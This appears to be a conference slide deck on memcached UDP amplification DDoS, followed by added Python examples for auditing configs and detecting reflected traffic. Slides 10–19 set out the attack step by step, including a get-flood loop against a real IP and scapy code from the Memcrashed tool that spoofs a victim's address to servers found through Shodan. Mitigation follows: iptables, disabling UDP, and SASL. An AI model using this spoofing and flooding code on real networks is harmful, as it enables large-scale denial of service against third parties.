
Memcache as udp traffic reflector

Memcache as UDP Reflectors: A Massive Amplified DDoS the World (Attack Formulation and Mitigation) by
Muhammad Morshed Alam, AmberIT Limited. morshed@amberit.com.bd


  1. Memcache as UDP Reflectors: A Massive Amplified DDoS the World (Attack Formulation and Mitigation). Presenter: Muhammad Morshed Alam, AmberIT Limited, morshed@amberit.com.bd <Arbor Networks> <Shodan Stats>
  2. Outlines • Memcache overview • Memcache variables and commands • Memcache DDoS amplification attack formulation, amplification factor • Memcache DDoS tools (set and get requests, spoofed UDP packets) • Mitigation (securing memcached servers using a firewall and SASL authentication)
  3. Memcached Overview • Free & open source, high-performance, distributed memory object caching system • Uses key-value pairs to store arbitrary data (strings, objects) • set(key, data) saves the data under key; get(key) returns the data stored under key • add, delete and replace commands strictly insert/remove data for a key • Optimizes backend database performance by temporarily storing information in cache memory
  4. Memcached mitigates the load from the DB and speeds up the web app response
  5. Install Memcache Service
     # sudo apt-get update
     # sudo apt-get install memcached
     # sudo apt-get install libmemcached-tools
     Check the running process:
     root@bdnog-memcace:~# ps aux |grep memcache
     Output: memcache 207 0.0 0.1 63388 1952 ? Ssl Apr12 0:02 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1
  6. Install Memcache Service Contd..
     Verify open ports with the ss command or netstat command:
     # ss -tulpn | grep :11211
     # netstat -tulpn | grep :11211
     Configuration file: # sudo vi /etc/memcached.conf
     Service restart process: # sudo systemctl restart memcached
  7. Memcache Variables and Commands: Connecting to the Memcache service:
     root@bdnog-memcace:~# telnet 127.0.0.1 11211
     Trying 127.0.0.1...
     Connected to 127.0.0.1.
     Escape character is '^]'.
     stats
     STAT pid 12476 STAT uptime 20 STAT time 1524726956 STAT version 1.4.25 Ubuntu STAT libevent 2.0.21-stable STAT pointer_size 64 STAT rusage_user 0.008000 STAT rusage_system 0.004000 STAT curr_connections 1 STAT total_connections 2 STAT connection_structures 2 STAT reserved_fds 20 STAT cmd_get 0 STAT cmd_set 0 STAT cmd_flush 0 STAT cmd_touch 0 STAT get_hits 0 STAT get_misses 0 STAT delete_misses 0 STAT delete_hits 0 STAT incr_misses 0 STAT incr_hits 0 STAT decr_misses 0 STAT decr_hits 0 STAT cas_misses 0 STAT cas_hits 0 STAT cas_badval 0 STAT touch_hits 0 STAT touch_misses 0 STAT auth_cmds 0 STAT auth_errors 0 STAT bytes_read 7 STAT bytes_written 0 STAT limit_maxbytes 67108864 STAT accepting_conns 1 STAT listen_disabled_num 0 STAT time_in_listen_disabled_us 0 STAT threads 4 STAT conn_yields 0 STAT hash_power_level 16 STAT hash_bytes 524288 STAT hash_is_expanding 0 STAT malloc_fails 0 STAT bytes 0 STAT curr_items 0 STAT total_items 0 STAT expired_unfetched 0 STAT evicted_unfetched 0 STAT evictions 0 STAT reclaimed 0 STAT crawler_reclaimed 0 STAT crawler_items_checked 0 STAT lrutail_reflocked 0 END
  8. Memcache-tools and outputs
     # Setting data for a key:
     set key 0 3600 16
     Welcome to BDNog
     STORED
     # Getting (returning) the value of a key:
     get key
     VALUE key 0 16
     Welcome to BDNog
     END
     Syntax: set <keyname> <some_flag> <expiration_in_milliseconds> <length_of_data_to_follow>
     Using the libmemcached-tools commands:
     root@bdnog-memcace:~# memcstat --servers 127.0.0.1
     Output: gives the present status of all memcache variables, i.e., STAT cmd_get 1 STAT cmd_set 1
     root@bdnog-memcace:~# memcdump --servers 127.0.0.1
     Output: all available keys that hold cached data, i.e., key
     root@bdnog-memcace:~# memcat --servers 127.0.0.1 key
     Output: returns the value of that key, i.e., Welcome to BDNog
  9. Vulnerable Memcached Server • No authentication required to access • Unauthenticated clients can inject a big payload into the cache • Listens on unreliable UDP port 11211 for any source IP address • UDP allows unreliable data delivery: target hosts receive data without prior consent. Stats of vulnerable memcached services available on the Internet (Qrator Labs and Akamai)
  10. Attack Formulation
     1. Find a vulnerable memcached server listening on UDP port 11211 with a high value of the variable limit_maxbytes
     2. Run a memcache SET command and fill one key to its max size with data to ensure a high payload
     3. Send multiple forged GET requests for that key over UDP continuously, spoofing the victim IP
     Attacker's UDP packets contain: • UDP GET key requests • Size: 15 B, SRC IP: spoofed target IP, DST port: 11211, DST IP: memcache host
     Vulnerable memcached servers exposed to the Internet and listening on UDP port 11211 <Victims/Targets>
     • GET commands reflected to the victim IP with (key, value)
     • Value of DATA is high, i.e., total size = (key, value) * # of requests
     • GET request 15 B => 750 kB response, 50000x amplification (Akamai report)
     • SRC IP: memcache host, DST IP: target, SRC port: 11211
  11. Memcache Amplification DDoS on bandwidth consumption: 1. An attacker may use multiple vulnerable memcached servers against a specific target IP by spoofing the SRC IP 2. The target network infrastructure is overwhelmed with UDP traffic
  12. Trends of Protocols Used for Reflection: most DDoS counted for Memcache (DDoSmon stats)
  13. DDoS attack bandwidth 1.3 Tbps on GitHub !!!
  14. Memcached Reflection Power. Inserting a key value into a vulnerable memcached server:
     # apt-get install python-memcache
     # python
     >>> import memcache
     >>> mc=memcache.Client(['1.2.3.4:11211'],debug=True)
     >>> mc.set('tot2',3423443534324234234234234)
     True
     >>> mc.get('tot2')
     3423443534324234234234234
     Max key value (size) => 1 MB; repeating the get request 1024 times => 1024 MB (1 GB) of reflected UDP traffic !!!!
  15. Flooding the resource with reflected UDP traffic:
     # touch get_flood.py
     #!/usr/bin/env python
     import memcache
     mc = memcache.Client(['202.4.96.85:11211'],debug=True)
     mc.set('tot2',1347534875923423432423)
     for i in range(10000):
         mc.get('tot2')
         print i
     root@morshed-Lenovo-G40-70:~# python get_flood.py
     MemCached: MemCache: inet:202.4.96.85:11211: connect: timed out. Marking dead.
  16. Dump Packets: Memcache Server / Get Requests Sender (packet capture figure)
  17. Dump Output Packets: (figure)
  18. Dump Output Packets (PPS Curve): (figure)
  19. Memcached DDoS Tools: sends forged UDP packets (spoofing the SRC IP as the target IP) to vulnerable memcached servers obtained using the Shodan API # git clone https://github.com/649/Memcrashed-DDoS-Exploit.git # apt-get install python3 # pip install shodan ;search engine # pip install scapy ;required to manipulate UDP packets Pass the API key collected from https://account.shodan.io/login and put the target victim IP address to run the attack # python3 Memcrashed.py ;x00injected is the key and some arbitrary value is inserted into the cache setdata = ("x00x00x00x00x00x00x00x00setx00injectedx000x003600x00%srn%srn" getdata = ("x00x00x00x00x00x00x00x00getx00injectedrn") ;using scapy SRC IP manipulation and sending the get request on behalf of the victim/target IP send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata) send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata)
  20. Dump Data: (figure)
  21. Mitigation
  22. Secure memcached server to avoid DDoS amplification attacks. Step-1: Configuring the firewall:
     For TCP:
     # /sbin/iptables -A INPUT -p tcp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
     # /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
     For UDP:
     # /sbin/iptables -A INPUT -p udp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
     # /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
     Or permanently disable for Zimbra Collaboration:
     # /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
     # /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
     Note: Save the iptables rules and check the rules: # iptables -L -v -n
  23. Secure memcached server to avoid DDoS amplification attacks contd… Step-2: Changing the configuration:
     # sudo vim /etc/memcached.conf
     -l 127.0.0.1,172.16.3.1 ;listening from localhost and trusted block
     -U 0 ;disable UDP 11211 listening
     # sudo systemctl restart memcached
  24. Validation of filtering rules:
     # nc 202.4.96.144 11211
     # nc -u 202.4.96.144 11211
     # telnet 202.4.96.144 11211
     # sudo nmap 202.4.96.144 -p 11211 -sU -sS --script memcached-info
  25. Adding Authorized user using SASL to Memcached Server:
     # memcstat --servers="127.0.0.1"
     Output: Server: 127.0.0.1 (11211) pid: 3831 uptime: 9 time: 1520028517, version: 1.4.25 . . .
     SASL helps to add authentication for memcached server clients.
     # sudo vim /etc/memcached.conf
     -S ;enable SASL
     -vv ;enable verbose output to /var/log/memcached
     Save and close the file.
     # sudo systemctl restart memcached
     # sudo journalctl -u memcached
     Output: Apr 27 22:03:58 memcached systemd-memcached-wrapper[2760]: Initialized SASL.
  26. Adding Authorized user using SASL to Memcached Server:
     # sudo apt-get install sasl2-bin ;SASL user database
     # sudo mkdir -p /etc/sasl2
     # sudo vi /etc/sasl2/memcached.conf
     mech_list: plain
     log_level: 5
     sasldb_path: /etc/sasl2/memcached-sasldb2
     # sudo saslpasswd2 -a memcached -c -f /etc/sasl2/memcached-sasldb2 morshed
     # sudo systemctl restart memcached
     # memcstat --servers="127.0.0.1" --username=morshed --password=*passwd*
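The hardening on slides 23 and 25 (bind to trusted addresses with -l, disable UDP with -U 0, enable SASL with -S) can be audited from the config file before a restart. The checker below is an added example written for this page, not a tool from the talk; the two config texts are constructed, and the trusted address list is an assumption taken from the slide's -l line.

```python
# Constructed /etc/memcached.conf contents (one option per line, as on the
# slides); both are examples written for this page, not copied from a host.
WEAK_CONF = """\
-d
-m 64
-p 11211
-u memcache
-l 0.0.0.0
"""

HARDENED_CONF = """\
-d
-m 64
-p 11211
-u memcache
-l 127.0.0.1,172.16.3.1
-U 0
-S
"""

def parse_memcached_conf(text):
    """Return {option: value}; '#' starts a comment, flags without a value map to ''."""
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        opts[parts[0]] = parts[1].strip() if len(parts) > 1 else ""
    return opts

def audit_memcached_conf(text, trusted=("127.0.0.1", "::1", "172.16.3.1")):
    """Check the three settings from slides 23 and 25; return a list of findings."""
    opts = parse_memcached_conf(text)
    findings = []
    # Slide 23: '-U 0' turns the UDP listener off. The 1.4.x build shown on the
    # slides listens on UDP 11211 by default when -U is absent.
    if opts.get("-U") != "0":
        findings.append("udp-enabled: add '-U 0' to close the UDP reflection vector")
    # '-l' limits bind addresses; absent or 0.0.0.0 means every interface.
    exposed = [a.strip() for a in opts.get("-l", "0.0.0.0").split(",")
               if a.strip() not in trusted]
    if exposed:
        findings.append("listen-exposed: -l includes %s; bind only loopback/trusted"
                        % ",".join(exposed))
    # Slide 25: '-S' enables SASL so clients must authenticate.
    if "-S" not in opts:
        findings.append("no-sasl: add '-S' and a /etc/sasl2/memcached.conf user database")
    return findings
```

The firewall rules on slide 22 still apply as a second layer: the audit only proves the daemon will not listen, not that the port is filtered.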

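From the victim side, the reflected traffic described on slides 10 and 11 has a fixed shape: UDP datagrams with source port 11211 arriving from many memcached hosts, each close to MTU size. The detector below is an added example for this page (not from the talk) that runs over constructed flow records; the field layout and the thresholds are assumptions.

```python
from collections import defaultdict

# Constructed sample flow records (not from the slides); one flow per line:
# src_ip src_port dst_ip dst_port proto bytes packets
SAMPLE_FLOWS = """\
203.0.113.10 11211 198.51.100.7 40000 udp 1433600 1024
203.0.113.11 11211 198.51.100.7 40000 udp 1433600 1024
203.0.113.12 11211 198.51.100.7 40000 udp 716800 512
198.51.100.7 53123 203.0.113.99 443 tcp 5200 40
192.0.2.5 11211 198.51.100.9 50000 udp 180 2
"""

def parse_flows(text):
    """Parse the whitespace-separated records above into dicts."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        src, sport, dst, dport, proto, nbytes, pkts = line.split()
        flows.append({"src": src, "sport": int(sport), "dst": dst,
                      "dport": int(dport), "proto": proto.lower(),
                      "bytes": int(nbytes), "packets": int(pkts)})
    return flows

def find_memcached_reflection(flows, min_avg_pkt=1000, min_bytes=1_000_000):
    """Aggregate UDP flows with source port 11211 per destination.

    A victim of the attack on slide 10 receives, from many memcached hosts,
    UDP datagrams with SRC port 11211 carrying the reflected key value in
    near-MTU pieces, so a destination with a high total byte count and a
    large average datagram size is flagged. A lone small flow (e.g. a
    genuine 'stats' reply of a few hundred bytes) is not.
    """
    per_dst = defaultdict(lambda: {"bytes": 0, "packets": 0, "reflectors": set()})
    for f in flows:
        if f["proto"] == "udp" and f["sport"] == 11211:
            agg = per_dst[f["dst"]]
            agg["bytes"] += f["bytes"]
            agg["packets"] += f["packets"]
            agg["reflectors"].add(f["src"])
    alerts = []
    for dst, agg in per_dst.items():
        avg_pkt = agg["bytes"] / agg["packets"] if agg["packets"] else 0
        if agg["bytes"] >= min_bytes and avg_pkt >= min_avg_pkt:
            alerts.append({"victim": dst, "reflectors": len(agg["reflectors"]),
                           "bytes": agg["bytes"], "avg_datagram": round(avg_pkt)})
    return alerts
```

On the reflector side the same logic applies in reverse: outbound UDP flows from your own port 11211 to an address that never opened a session are the sign that the host is being used as described on slide 9.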